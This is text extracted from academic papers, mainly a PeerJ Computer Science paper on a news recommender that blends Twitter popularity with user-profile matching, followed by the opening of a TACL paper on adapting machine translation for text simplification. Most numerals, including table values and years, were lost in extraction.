profile-based news recommendations since they rank the news articles based on the user’s interests. the following two sections explore the applications based on the popularity based recommendation and profile- based recommendation techniques. popularity based news recommender systems news recommender systems are widely used to help readers filter through an ever- growing flood of information. many researchers focus on using real-time social networking sites such as facebook, google plus, and twitter to identify the most popular current news stories. because they are instant and widely available, they provide a massive source of information on current events. however, because they are unmoderated, the quality of the information is variable. jackoway, samet & sankaranarayanan ( ) discuss a method to determine which twitter users are posting reliable information and which posts are interesting. micro-blog posts can also be used as a way of identifying the popularity of certain events. smyth et al. represent users and items based on micro-blogging reviews of movies and used this technique with various movie recommendation strategies on live-user data (esparza, o’mahony & smyth, ). phelan, mccarthy & smyth ( ) focus on using micro-blogging activity to recommend news stories. their recommender system, buzzer, is applied to rss feeds to which the users have subscribed. buzzer mines terms from rss and twitter feeds and uses them to rank articles. phelan et al. ( a) and phelan et al. ( b), they extended their work by considering the public- rank and the friends-rank strategy rather than just considering the articles from the users’ index. profile-based news recommender systems profile-based, or personalized, news recommender systems recommend articles to the user based solely on his/her interests. a user profile is built based on the preferences or interests of the user. in one of the earliest news recommendation systems, pazzani, jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ muramatsu & billsus ( ) created news dude, a personal news-recommending agent that uses tf-idf in combination with a nearest neighbor algorithm in order to recommend news stories to users (billsus & pazzani, ). they developed a hybrid user model that considers both long-term and short-term interests and found out that this model outperformed the models that consider either of these interests. similarly, li et al. ( ) described a content-based recommender system that recommends news articles to a user based upon the user’s short-term and long-term reading preferences. the work from abel et al. ( ) presents a good correlation between user profile features and its relative efficiency for recommendations. they evaluate and compare three different strategies for building user profile upon tweeter stream. the three types of user profile are: entity-based user profiles, hashtag-based user profiles, and topic-based user profiles. they concluded that entity-based user profiles are the most valuable profiles and that they are a better fit for recommendation purposes. they then used this type of profile in their personalized news recommender system. recently, oh et al. ( ) proposed an innovative recommender system to recommend personalized news stories using content-based analysis of tweets in twitter. in their work, they first build a user profile by extracting keywords from the content of tweets, re-tweets and hashtags. a keyword classifier based on deep neural network analysis is being used to classify interesting keywords. then, they recommend news articles to the user using topic modeling techniques as well as tf-idf. our news recommender system incorporates both the strategies explained above, popularity and conceptual user profiles, to present a novel hybrid approach to recommend news articles to the user that are both relevant to their interests and popular with a wide audience. approach in this section, we present an overview of our hybrid news recommendation system. our basic approach is to recommend interesting news articles to the user based on a combination of his past interests and stories that are currently of broad interest. the user’s interests are captured in his user profile and the community as a whole’s broad interest is captured from tweets collected from twitter’s public timeline. finally, our intuition is that users most want to see news stories related to topics in their profile that are also creating a buzz on the blogosphere. in other words, users are shown hot stories related to their favorite topics. high-level design figure shows an architectural diagram of our hybrid news recommender system. the hybrid system consists of three modules: . popularity-based news recommender . profile-based news recommender . hybrid news recommender jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ each module implements a different approach to selecting the news articles to recommend to the user. the first module selects news articles based on the popularity of the article. the popularity of the article is identified with the help of tweets from the twitter’s public. articles that are mentioned frequently in the tweets are considered “hot” or popular. this recommender module ranks the articles based on their overall popularity. the second module ranks the news articles based on their similarity to a user’s profile. the news articles are ranked based on their similarity between the categories in the user’s profile and the categories to which the article belongs. the third module fuses the results from the above to modules to recommend interesting news articles to the user. the articles are ranked based on a combination of their popularity ranking and the similarity to the user’s profile. in contrast to the first module that recommends “hot” articles that are of interest to the world at large and the second module that recommends articles related to the user’s profile regardless of their popularity, this module recommends “hot” articles that are relevant to topics interesting to the user. popularity-based news recommender system figure shows an architectural diagram of the popularity-based news recommender system. first, the rss articles are collected from a news source such as cnn or the bbc and stored in the file system. these websites organize their stories by category, e.g., sports, business, politics, and entertainment etc. the file system stores all the articles organized into folders based on the category to which they belong. the rss articles are pre- processed to remove unnecessary content (html tags, numbers, etc.) while preserving the textual content. figure architecture of the hybrid news recommender system. jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ the pre-processed articles are then indexed by solr, an open source enterprise search platform from the apache lucene project (apache solr; http://lucene.apache.org/solr/). solr uses the lucene java search library at its core for indexing and search, and it has several apis that make it flexible to use from any programming language. solr is comprised of three main components, an indexer, a lucene index and a server. the indexer is responsible for collecting all the pre-processed articles from the article collection and creating a lucene index over them. the lucene index is a file-based inverted file that supports fast lookup by document content. the solr apache server works on top of this lucene index developed by the indexer. any requests must be made to the server that outputs results based on the underlying index. all the queries are submitted to the server which outputs the documents based on the index. figure diagrams the solr architecture. in order to identify which news stories are most popular, we also collect data from the twitter micro-blogging site. the tweet collector collects the tweets from twitter’s public timeline via the twitter’s streaming api. the collected tweets are stored in the tweet collection in json format. the tweet processor is responsible for parsing the tweet figure architecture of the popularity-based news recommender. figure solr architecture. jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://lucene.apache.org/solr/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/ collection by eliminating unwanted noise and preserving the tweet content. each processed tweet is queried against the server to retrieve the articles that match the tweet contents. solr returns articles, and weights, based on how well each article matches the tweet according to the cosine similarity value. the weights for each article are accumulated across all tweets to produce a popularity weight for the article. thus, the popularity_wt for article i is the sum of the cosine similarity of all matching current tweets: popularity wti ¼ x t t cosinesimilarity articlei; tweettð Þ where t is the number of tweets collected articlei is the news article whose popularity is being calculated tweett is the tweet being matched against the article profile-based news recommender system in this section, we describe the profile-based news recommender system which is used as a baseline later on for evaluating the effectiveness of our different approaches. this system is comprised of four components and each component is explained in detail in the following paragraphs. figure shows the architectural diagram of the profile-based news recommender system. the profile-based recommender system uses the same article collection as the popularity-based recommender system. although articles are placed in only one category by the website editor, they may actually partially belong to more than one category. figure architecture of the profile-based recommender system. jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ to allow for this, each article is classified into all potential categories using a k-nearest neighbor classifier (shiwen, baoli & qin, ), the classification module of the keyconcept project (gauch, ravindran & chandramouli, ). this tool classifies the articles to categories based on the article’s similarity to training documents for each category. the k-nearest neighbors classification approach identifies the k most similar training documents to the article then uses those similarity scores as votes for the category to which the training documents belong. the similarity of the article to each category is thus the sum of the scores of the article’s similarity to the training documents in that category that fall in the top k most similar documents overall. these categories are then sorted based on their accumulated scores. we store the top most similar categories (and their similarity scores) for use in profile matching. in order to do fast lookup by category, we again use solr to build a second lucene index that maps from category ids to document ids and weights. next, each user creates his or her own profile by manually scoring the categories presented on a web form. this user profile is used to identify documents that best match their profile. the profiles and the articles can be viewed as feature vectors where each category is a feature. the similarity of each article to the user’s profile is calculated using the inner product between the user profile’s category vector and the article’s category vector. thus, for a given user j, the personal_wt for article i is: personal wtij ¼ cosinesimilarity articleprofilei; userprofilej � � where articleprofilei is a vector of the weights for each category in the ontology for articlei userprofilej is a vector of the weights for each category in the ontology for userj to implement this, we reuse solr, querying with the lucene index that stored the article category vectors with the user’s profile. hybrid news recommender system the hybrid recommender module combines the weights provided by each of the previous two modules to produce a recommendation based on both the articles popularity to users everywhere and the article’s likely interest to the particular user. we first experimented with multiplying the two factors together. this module calculates a hybrid weight by combining the two scores. the hybrid weight for article i and user j is given by: hybrid wt ij ¼ popularity wtj � personal wtij next, we incorporate a tunable parameter, a, that controls how much each of the two components contributes. hybrid wt ij ¼ � � popularity wtj þ � �ð Þ � personal wtij when a is . , only the personalized_wt contributes to the overall weight. as a increases from . – . , the popularity_wt’s contribution increases and the personalized_wt’s jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ contribution decreases. eventually, when a is . , only the popularity_wt influences the ranking. sample scenario we now include a sample scenario to illustrate how the various recommender systems work. consider the following example consisting of six news articles collected from online news sites and seven recent tweets collected from twitter. assume that articles b , b , and b were related to business, article e is about entertainment, and that articles s and s were about sports. furthermore, assume that these three categories are the only categories in the ontology and that the system’s goal is to recommend three articles to the user. popularity-based recommender we will begin describing the popularity based recommendation system that recommends news articles based only on the number of tweets related to the articles. the news articles are indexed with the solr lucene indexer and the tweets queried against that collection to identify the most relevant two articles for each tweet and the associated cosine similarity scores. the cosine similarity scores for each article are then accumulated to produce the popularity_wt for each article. table shows the top two cosine similarity scores for each tweet with respect to each article. the popularity based recommender would then accumulate the cosine similarity scores for each article and the resulting aggregated value is known as the popularity_wt for that article. the articles would be sorted by in decreasing order by popularity_wt as shown in table . table data set for the sample scenario. article b article b article b article e article s article s tweet . . tweet . . tweet . . tweet . . tweet . . tweet . . tweet . . table popularity-based ranking of the articles. article popularity_wt b . e . s . b . b . s . jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ the popularity-based news recommender system would thus produce the following recommendations, in order: article b , article e , and article s . note the three recommendations are about three different topics, i.e., business, entertainment, and sports respectively. profile-based recommender we will now discuss the profile-based news recommender system in more detail. the user first needs to manually create his/her profile based on his/her interests in various categories. for this simple example, assume that the user creates the profile shown in table . the news articles in the collection are classified with using a knn classifier. for each article, the classifier returns a weight for each category that represents the similarity between that category and the article. table summarizes the results of this classification, showing the weights for each article for the top two matching categories. the personal_wt for each article is then produced by calculating the dot product of the category vectors for each article with the category vector for the user profile. for example, the weight for article b would be ( � . ) in business + ( � ) for entertainment + ( � . ) in sports for a total weight of . . the articles are then sorted in decreasing order by personal_wt. table shows the results of these calculations for this example. table user profile. category weight business entertainment sports table articles and their category-match weights. articles business wt entertainment wt sports wt b . . . b . . . b . . . e . . . s . . . s . . . table profile-based ranking of the articles. article personal_wt b . s . b . s . b . e . jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ the profile-based news recommender system would thus produce the following recommendations, in order: article b , article s , and article b . note that two of the three recommended articles are business-related and the middle recommendation is about sports. this reflects the user’s interests as captured by their profile. furthermore, the top recommendation is for article b versus b previously. b is a better match to the business category whereas b was much more popular on twitter. hybrid recommender we now continue our example using the set of articles in the previous examples to describe the hybrid recommendation system. the popularity_wt and personal_wt scores for each article are normalized and the hybrid_wt is the product of these normalized weights. table illustrates this process. the articles are then sorted by decreasing order by hybrid_wt to produce the final recommendations, as shown in table . the hybrid news recommender system would thus produce the following recommendations, in order: article b , article b , and article s . article b appears at the top because it is such a strong match for the user’s most highly weighted profile category. articles b and s appear because they are moderate matches for the user’s profile and also quite popular on twitter, illustrating the effects of the hybrid recommender. evaluation this section describes the experiments that we conducted to evaluate the accuracy of the recommendations based on popularity, user profile, and the hybrid recommendations. all experiments were conducted on the same collection of news articles news articles collected from cnn and bbc and , tweets collected from twitter on the same day. table hybrid ranking of the articles. article popularity_wt normalized popularity_wt personal_wt normalized personal_wt b . . . b . . . b . . . . e . . . . s . . . . s . . . . table hybrid ranking of the articles. article hybrid_wt b . b . s . b . e . s . jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ we collected news articles for each of topics (sports, crime, business, politics, tech, health and entertainment). the results reported here were produced using volunteer test subjects. to evaluate the relative importance of global popularity versus individual interest in a story, we varied a from . – . in increments of . , a total of values. the profiles-based recommender system alone constitutes our baseline approach, that is, we compared both the popularity-based recommender system and the hybrid recommender system to that baseline. evaluating matching tweets to articles in our popularity-based recommender, the popularity of the news articles is determined with the help of the tweets from the twitter’s public timeline. a key component of that recommender is the ability to associate tweets from twitter with news articles, thus being able to identify those articles being talked about the most on the blogosphere. the goal of this experiment is to determine whether or not we can accurately match a tweet with a related news article so that we can build our popularity-based recommender around that tweet/news article-matching component. to evaluate the accuracy of the solr-provided tweet/article matches, we have selected five tweets from each of the seven news categories as test tweets ( test tweets total). we randomly selected five tweets from the tweets database that were good matches for the categories in our news article database. each test tweet was queried against the solr apache server to retrieve the top matching news articles. for each tweet’s result set, we examined the category associated with each of the top five articles. for each of those articles, we examined the category associatedwith the article and comparedthat article with thecategory associated with the tweet to judge the accuracy of our tweet/article matching module. the results of our evaluation are shown in fig. . overall, we have % accuracy in the top articles matched against a tweet. that is, % of the time, the articles retrieved in response to a given tweet match the category to which the tweet is related. our best performance is with sports related tweets ( %) and the worst is with health ( %). evaluating the hybrid recommender each volunteer test subject was presented with a web page on which they entered weights from – indicating their personal interest each of the seven categories. the users entered the weights such they totaled to . these category/weight pairs form their user profile. we essentially have two baselines to which we compare our hybrid recommender system, a purely conceptual, personalized recommender system and a purely popularity-based recommender system. these are incorporated into our evaluation of hybrid_wt , i.e., when a is , only the personal_wt contributes to the score, so we get purely profile-based recommendations. similarly, when a is , only popularity_wt contributes to the score, so the user receives purely popularity-based recommendations. for the articles retrieved by hybrid_wt and each of the values of a for hybrid_wt , evaluated, we calculated the weight of each article in our collection and sorted the articles by weight. we stored the articleid, the hybrid_wt, and rank for the top articles. thus, each subject had sets of documents to judge. different values of a bring new jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ articles to the top but they also rearrange the ordering of articles that appear in other result sets. although subjects could potentially be asked to judge articles, the average number of unique articles judged by the subjects was . to avoid user fatigue and gather consistent feedback, each article was presented to be judged only once, and that judgment used to evaluate all the result sets in which the article appeared. in order to avoid bias, we randomized the order of presentation of the news articles to the user. thus, they did not know which system(s) recommended the news articles or where the articles were ranked originally. the users were asked to rate each article recommended as very interesting, interesting, or not interesting. once the user finishes rating all the articles, information such as profile, the article’s strategy, rank, weight and the user’s rating were logged into a file for analysis. results we evaluated our recommender systems using the normalized discounted cumulative gain at top k (ndcg@k), a widely used metric for rank ordered lists. we analyzed the results of users who completed the evaluation of the top documents for each method. with that metric, hybrid_wt produces a ndcg@ of . . our next task is to tune hybrid_wt to identify the best performing value for a so that we can compare our two hybrid approaches. the ndcg@ over all users as alpha is varied from (pure personalized) to (pure popularity) in steps of . is depicted graphically in fig. . the worst performance, . , arises when the popularity measure dominates the ratings is considered (a = . ). when only the popularity_wt is used, the ndcg is quite low, . . in contrast, when the only user’s profile is considered (a = . ), we achieve an ndcg of . . our results show that as measured by the ndcg metric, both a = . and a = . outperform all other a values tied with an ndcg of . . these results indicate that the a cc u ra cy figure accuracy of tweet/category matching. jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ most relevant articles are those that are selected using a relatively equal combination mixture of their interests and general public’s interests. table contains a comparison of both hybrid approaches to the baselines of purely personal and purely popular recommendations. overall, hybrid_wt with a = . outperforms hybrid_wt by . %, personal_wt by . %, and popularity_wt by . %. we performed a paired two-tailed student’s t-test analysis and confirmed that the hybrid_wt improvement versus the personal_wt was statistically significant (p = . ). similarly, the hybrid_wt improvement versus the popularity_wt was statistically significant (p = . ) as was the improvement of hybrid_wt over hybrid_wt (p = . ). conclusion in this paper, we presented the design and implementation of a news recommender system that incorporates a novel approach to recommend interesting news articles to the user. we implemented four different strategies to recommend news articles to the user that are interesting to read. we have evaluated each of the strategies by comparing them to our baseline approach which is the personal recommender system. we found that: . both hybrid approaches outperform the popularity and personal recommendations. . the personal recommender provides better recommendations than the popularity- based recommender. . the tunable hybrid algorithm with a = . provided the best overall performance. . . . . . . . . . . . . . . n d c g @ α value figure evaluating hybrid_wt : ndcg@ versus a. table ndcg@ per approach. personal (a = ) popularity (a = ) hybrid_wt hybrid_wt (a = . ) ndcg@ . . . . jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ we can extend this work in several ways. in particular, the accuracy of our news recommender system can be improved by considering other features such as location or temporal activity. also, our users provided explicit feedback about the categories in which they were interested. the recommender system could be improved by implicitly inferring the users’ interests based on their reading habits. additional information and declarations funding the authors received no funding for this work. competing interests susan gauch is an academic editor for peerj computer science. author contributions � nirmal jonnalagedda conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. � susan gauch conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, reviewed drafts of the paper, submitted manuscript for publication. � kevin labille wrote the paper, prepared figures and/or tables, reviewed drafts of the paper, updated literature review. � sultan alfarhood analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables. data deposition the following information was supplied regarding data availability: the raw data includes human subjects information that cannot be shared. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information. references abel f, gao q, houben gj, tao k. . analyzing user modeling on twitter for personalized news recommendations. user modeling, adaption and personalization. berlin, heidelberg: springer, – . balabanovic m, shoham y. . fab: content-based, collaborative recommendation. communications of the acm. new york: acm, – . billsus d, pazzani mj. . a personal news agent that talks, learns and explains. in: proceedings of the third annual conference of autonomous agents, new york: acm press, – . jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplementalnformation http://dx.doi.org/ . /peerj-cs. #supplementalnformation http://dx.doi.org/ . /peerj-cs. https://peerj.com/ das as, datar m, garg a, rajaram s. . google news personalization: scalable online collaborative filtering. in: proceedings of the sixteenth international conference on world wide web, new york, ny, usa, – . esparza sg, o’mahony mp, smyth b. . on the real-time web as a source of recommendation knowledge. in: proceedings of the fourth acm conference on recommender systems, recsys , barcelona, spain, – september, new york: acm, – . gauch s, ravindran d, chandramouli a. . keyconcept: conceptual search and pruning exploiting concept relationships. journal of intelligent systems ( ): – doi . /jisys. . . . . gong s. . a collaborative filtering recommendation algorithm based on user clustering and item clustering. journal of software ( ): – doi . /jsw. . . - . hill w, stead l, rosenstein m, furnas g. . recommending and evaluating choices in a virtual community of use. in: proceedings of the sigchi conference on human factors in computing systems, new york: acm press/addison-wesley publishing co., – . jackoway a, samet h, sankaranarayanan j. . identification of live news events using twitter. in: proceedings of the third acm sigspatial international workshop on location-based social networks, new york, ny, usa. new york: acm, – . kang n, doornenbal m, schijvenaars b. . elsevier journal finder: recommending journals for your paper. in: proceedings of the ninth acm conference on recommender systems, new york: acm, – . koren y. . factor in the neighbors: scalable and accurate collaborative filtering. acm transactions in knowledge discovery from data (tkdd) ( ):article doi . / . krulwich b, burkey c. . learning user information interests through extraction of semantically significant phrases. in: proceedings of the aaai spring symposium on machine learning in information access. palo alto: aaai press, – . lang k. . newsweeder: learning to filter netnews. in: proceedings of the twelfth international conference on machine learning. san francisco: morgan kaufmann, – . li l, zheng l, yang f, li t. . modeling and broadening temporal user interest in personalized news recommendation. expert systems with applications ( ): – doi . /j.eswa. . . . li x, cong g, li xl, pham tan, krishnaswamy s. . rank-geofm: a ranking based geographical factorization method for point of interest recommendation. in: proceedings of the th international acm sigir conference on research and development in information retrieval. new york: acm, – . mcnee m, albert i, cosley d, gopalkrishnan p, lam ks, rashid ma, konstan aj, riedl j. . on the recommending of citations for research papers. in: proceedings of the acm conference on computer supported cooperative work, new york, ny, usa. new york: acm, – . mooney rj, roy l. . content-based book recommending using learning for text categorization. in: proceedings of the fifth acm conference on digital libraries, new york, ny, usa. new york: acm, – . oh kj, lee wj, lim cg, choi hj. . personalized news recommendation using classified keywords to capture user preference. in: proceedings of the sixteenth international conference on advanced communication technology, – feb. piscataway: ieee, – . pazzani m, muramatsu j, billsus d. . syskill & webert: identifying interesting web sites. in: proceedings of the thirteenth national conference on artificial intelligence. palo alto: aaai press, – . jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /jisys. . . . http://dx.doi.org/ . /jsw. . . - http://dx.doi.org/ . / http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/ phelan o, mccarthy k, bennett m, smyth b. a. on using the real-time web for news recommendation & discovery. in: proceedings of the twentieth international conference companion on world wide web, hyderabad, india, march– april. phelan o, mccarthy k, bennett m, smyth b. b. terms of a feather: content-based news recommendation and discovery using twitter. in: proceedings of the thirty-third european conference on advances in information retrieval. berlin, heidelberg: springer. phelan o, mccarthy k, smyth b. . using twitter to recommend real-time topical news. in: proceedings of the third acm conference on recommender systems, new york, ny, usa, – october. new york: acm, – . resnick p, iacovou n, suchak m, bergstrom p, riedl j. . grouplens: an open architecture for collaborative filtering of netnews. in: proceedings of the acm conference on computer-supported cooperative work, chapel hill, nc. new york: acm, – . sarwar b, karypis g, konstan j, riedl j. . item-based collaborative filtering recommendation algorithms. in: proceedings of the tenth international conference on world wide web, – . shiwen y, baoli l, qin l. . an adaptive k-nearest neighbor text categorization strategy. journal of acm transactions on asian language information processing (talip) ( ): – doi . / . . su x, khoshgoftaar tm. . a survey of collaborative filtering techniques. advances in artificial intelligence : doi . / / . tkalcic m, odic a, kosir a, tasic j. . affective labeling in a content-based recommender system for images. ieee transactions on multimedia ( ): – doi . /tmm. . . tuzhilin a, adomavicius g. . toward the next generation of recommender systems: a survey of the state-of-the-art and possible extensions. ieee transactions on knowledge and data engineering. piscataway: ieee, – . yu h, zhang f. . collaborative filtering recommender system in adversarial environment. in: international conference on machine learning and cybernetics (icmlc) – july. piscataway: ieee. jonnalagedda et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / . http://dx.doi.org/ . / / http://dx.doi.org/ . /tmm. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/ incorporating popularity in a personalized news recommender system introduction literature review approach evaluation conclusion references optimizing statistical machine translation for text simplification wei xu , courtney napoles , ellie pavlick , quanze chen and chris callison-burch computer and information science department university of pennsylvania {xwe, epavlick, cquanze, ccb}@seas.upenn.edu department of computer science johns hopkins university courtneyn@jhu.edu abstract most recent sentence simplification systems use basic machine translation models to learn lexical and syntactic paraphrases from a man- ually simplified parallel corpus. these meth- ods are limited by the quality and quantity of manually simplified corpora, which are expen- sive to build. in this paper, we conduct an in- depth adaptation of statistical machine trans- lation to perform text simplification, taking advantage of large-scale paraphrases learned from bilingual texts and a small amount of manual simplifications with multiple refer- ences. our work is the first to design auto- matic metrics that are effective for tuning and evaluating simplification systems, which will facilitate iterative development for this task. introduction the goal of text simplification is to rewrite an input text so that the output is more readable. text sim- plification has applications for reducing input com- plexity for natural language processing (siddharthan et al., ; miwa et al., ; chen et al., b) and providing reading aids for people with lim- ited language skills (petersen and ostendorf, ; watanabe et al., ; allen, ; de belder and moens, ; siddharthan and katsos, ) or lan- guage impairments such as dyslexia (rello et al., ), autism (evans et al., ), and aphasia (car- roll et al., ). it is widely accepted that sentence simplification can be implemented by three major types of oper- ations: splitting, deletion and paraphrasing (feng, ). the splitting operation decomposes a long sentence into a sequence of shorter sentences. dele- tion removes less important parts of a sentence. the paraphrasing operation includes reordering, lexical substitutions and syntactic transformations. while sentence splitting (siddharthan, ; petersen and ostendorf, ; narayan and gardent, ; an- grosh et al., ) and deletion (knight and marcu ; clarke and lapata ; filippova and strube ; filippova et al. ; rush et al. ; and others) have been intensively studied, there has been considerably less research on developing new para- phrasing models for text simplification — most pre- vious work has used off-the-shelf statistical machine translation (smt) technology and achieved reason- able results (coster and kauchak, a,b; wubben et al., ; štajner et al., ). however, they have either treated the judgment technology as a black (coster and kauchak, a,b; narayan and gar- dent, ; angrosh et al., ; štajner et al., ) or they have been limited to modifying only one as- pect of it, such as the translation model (zhu et al., ; woodsend and lapata, ) or the reranking component (wubben et al., ). in this paper, we present a complete adaptation of a syntax-based machine translation framework to perform simplification. our methodology poses text simplification as a paraphrasing problem: given an input text, rewrite it subject to the constraints that the output should be simpler than the input, while preserving as much meaning of the input as pos- sible, and maintaining the well-formedness of the text. going beyond previous work, we make di- transactions of the association for computational linguistics, vol. , pp. – , . action editor: stefan riezler. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. rect modifications to four key components in the smt pipeline: ) two novel simplification-specific tunable metrics; ) large-scale paraphrase rules au- tomatically derived from bilingual parallel corpora, which are more naturally and abundantly available than manually simplified texts; ) rich rule-level simplification features; and ) multiple reference simplifications collected via crowdsourcing for tun- ing and evaluation. in particular, we report the first study that shows promising correlations of au- tomatic metrics with human evaluation. our work answers the call made in a recent tacl paper (xu et al., ) to address problems in current simplifi- cation research — we amend human evaluation cri- teria, develop automatic metrics, and generate an improved multiple reference dataset. our work is primarily focused on lexical simplifi- cation (rewriting words or phrases with simpler ver- sions), and to a lesser extent on syntactic rewrite rules that simplify the input. it largely ignores the important subtasks of sentence splitting and dele- tion. our focus on lexical simplification does not af- fect the generality of the presented work, since dele- tion or sentence splitting could be applied as pre- or post-processing steps. background xu et al. ( ) laid out a series of problems that are present in current text simplification research, and argued that we should deviate from the previous state-of-the-art benchmarking setup. first, the simple english wikipedia data has dom- inated simplification research since (zhu et al., ; siddharthan, ), and is used together with standard english wikipedia to create parallel text to train mt-based simplification systems. how- ever, recent studies (xu et al., ; amancio and specia, ; hwang et al., ; štajner et al., ) showed that the parallel wikipedia simplifi- cation corpus contains a large proportion of inade- quate (not much simpler) or inaccurate (not aligned or only partially aligned) simplifications. it is one of the leading reasons that existing simplification sys- tems struggle to generate simplifying paraphrases and leave the input sentences unchanged (wubben our code and data are made available at: https:// github.com/cocoxu/simplification/ et al., ). previously researchers attempted some quick fixes by adding phrasal deletion rules (coster and kauchak, a) or reranking n-best outputs based on their dissimilarity to the input (wubben et al., ). in contrast, we exploit data with im- proved quality and enlarged quantity, namely, large- scale paraphrase rules automatically derived from bilingual corpora and a small amount of manual simplification data with multiple references for tun- ing parameters. we then systematically design new tuning metrics and rich simplification-specific fea- tures into a syntactic machine translation model to enforce optimization towards simplicity. this ap- proach achieves better simplification performance without relying on a manually simplified corpus to learn paraphrase rules, which is important given the fact that simple wikipedia and the newly released newsela simplification corpus (xu et al., ) are only available for english. second, previous evaluation used in the simplifi- cation literature is uninformative and not compara- ble across models due to the complications between the three different operations of paraphrasing, dele- tion, and splitting. this, combined with the unreli- able quality of simple wikipedia as a gold reference for evaluation, has been the bottleneck for develop- ing automatic metrics. there exist only a few stud- ies (wubben et al., ; štajner et al., ) on au- tomatic simplification evaluation using existing mt metrics which show limited correlation with human assessments. in this paper, we restrict ourselves to lexical simplification, where we believe mt-derived evaluation metrics can best be deployed. our newly proposed metric is the first automatic metric that shows reasonable correlation with human evalua- tion on the text simplification task. we also intro- duce multiple references to make automatic evalua- tion feasible. the most related work to ours is that of gan- itkevitch et al. ( ) on sentence compression, in which compression of word and sentence lengths can be more straightforwardly implemented in fea- tures and the objective function in the smt frame- work. we want to stress that sentence simplifica- tion is not a simple extension of sentence compres- sion, but is a much more complicated task, primarily because high-quality data is much harder to obtain and the solution space is more constrained by word choice and grammar. our work is also related to other tunable metrics designed to be very simple and light-weight to ensure fast repeated computation for tuning bilingual translation models (liu et al., ; chen et al., a). to the best of our knowledge, no tunable metric has been attempted for simplifica- tion, except for bleu. nor do any evaluation met- rics exist for simplification, although there are sev- eral designed for other text-to-text generation tasks: grammatical error correction (napoles et al., ; felice and briscoe, ; dahlmeier and ng, ), paraphrase generation (chen and dolan, ; xu et al., ; sun and zhou, ), and conversation generation (galley et al., ). another line of re- lated work is lexical simplification that focuses on finding simpler synonyms of a given complex word (yatskar et al., ; biran et al., ; specia et al., ; horn et al., ). adapting machine translation for simplification we adapt the machinery of statistical machine trans- lation to the task of text simplification by making changes in the following four key components: . simplification-specific objective functions in the statistical machine translation framework, one crucial element is to design automatic evaluation metrics to be used as training objectives. train- ing algorithms, such as mert (och, ) or pro (hopkins and may, ), then directly optimize the model parameters such that the end-to-end simplifi- cation quality is optimal. unfortunately, previous work on text simplification has only used bleu for tuning, which is insufficient as we show empirically in section . we propose two new light-weight met- rics instead: fkbleu that explicitly measures read- ability and sari that implicitly measures it by com- paring against the input and references. unlike machine translation metrics which do not compare against the (foreign) input sentence, it is necessary to compare simplification system outputs against the inputs to assess readability changes. it is also important to keep tunable metrics as simple as possible, since they are repeatedly computed dur- ing the tuning process for hundreds of thousands of candidate outputs. fkbleu our first metric combines a previously proposed metric for paraphrase generation, ibleu (sun and zhou, ), and the widely used readability metric, flesch-kincaid index (kincaid et al., ). ibleu is an extension of the bleu metric to measure di- versity as well as adequacy of the generated para- phrase output. given a candidate sentence o, human references r and input text i, ibleu is defined as: ibleu = α× bleu(o,r) ( ) −( −α)× bleu(o,i). where α is a parameter taking balance between ade- quacy and dissimilarity, and set to . empirically as suggested by sun and zhou ( ). since the text simplification task aims at improv- ing readability, we include the flesch-kincaid index (fk) which estimates the readability of text using cognitively motivated features (kincaid et al., ): fk = . × ( #words #sentences ) ( ) + . × ( #syllables #words ) − . with a lower value indicating higher readability. we adapt fk to score individual sentences and change it so that it counts punctuation tokens as well as word, and counts each punctuation token as one syllable. this prevents it from arbitrarily deleting punctua- tion. fk measures readability assuming that the text is well-formed, and therefore is insufficient alone as a metric for generating or evaluating automatically generated sentences. combining fk and ibleu captures both a measure of readability and adequacy. the resulting objective function, fkbleu, is de- fined as a geometric mean of the ibleu and the fk difference between input and output sentences: fkbleu = ibleu(i,r,o)× fkdiff(i,o) fkdiff = sigmoid(fk(o)− fk(i)) ( ) sentences with higher fkbleu values are better simplifications with higher readability. the fk coefficients were derived via multiple regression applied to the reading compression test scores of navy per- sonnel reading training manuals. these values are typically used unmodified, as we do here. sari we design a second new metric sari that prin- cipally compares system output against references and against the input sentence. it explicitly mea- sures the goodness of words that are added, deleted and kept by the systems (figure ). we reward addition operations, where system out- put o was not in the input i but occurred in any of the references r, i.e. o ∩ i ∩r. we define n-gram precision p(n) and recall r(n) for addition opera- tions as follows: padd(n) = ∑ g∈o min ( #g(o ∩ i), #g(r) ) ∑ g∈o #g(o ∩ i) radd(n) = ∑ g∈o min ( #g(o ∩ i), #g(r) ) ∑ g∈o #g(r ∩ i) ( ) where #g(·) 